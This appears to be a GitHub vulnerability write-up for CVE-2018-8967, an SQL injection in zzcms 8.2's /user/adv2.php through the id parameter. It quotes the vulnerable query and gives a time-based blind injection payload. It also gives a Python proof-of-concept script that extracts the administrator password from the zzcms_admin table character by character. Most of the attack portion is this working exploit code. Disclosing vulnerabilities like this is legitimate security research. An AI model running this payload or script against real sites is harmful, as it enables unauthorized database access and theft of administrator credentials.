Headline
CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability
An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request.
Permalink
Cannot retrieve contributors at this time
title
tags
grammar_cjkRuby
adv2.php
新建,模板,小书匠
true
/user/adv2.php****Edition :
zzcms 8.2
Location
/user/adv2.php
Code:
$rs=query(“select * from zzcms_ad where id=".$_POST[“id”]."”);
Rows : 72****Harm
Can get password through SQl injection
Cause the cause
Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0
That is to say, let zzcms_main or zzcms_zh have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST
Then go back and find that need to let action=modify
At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.
poc
import requests import string s = requests.session() url = “http://127.0.0.1:8080/user/adv2.php?action=modify” cookies = { ‘UserName’:’test2’ } flag = ‘’ for i in range(1,40): for j in range(33,125): data = { 'id’:’0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i,j) } #print data r = s.post(url,data=data,cookies=cookies) #print r.text sec=r.elapsed.seconds #print i,j,sec if sec >2: flag += chr(j) print flag break print flag
Get the administrator password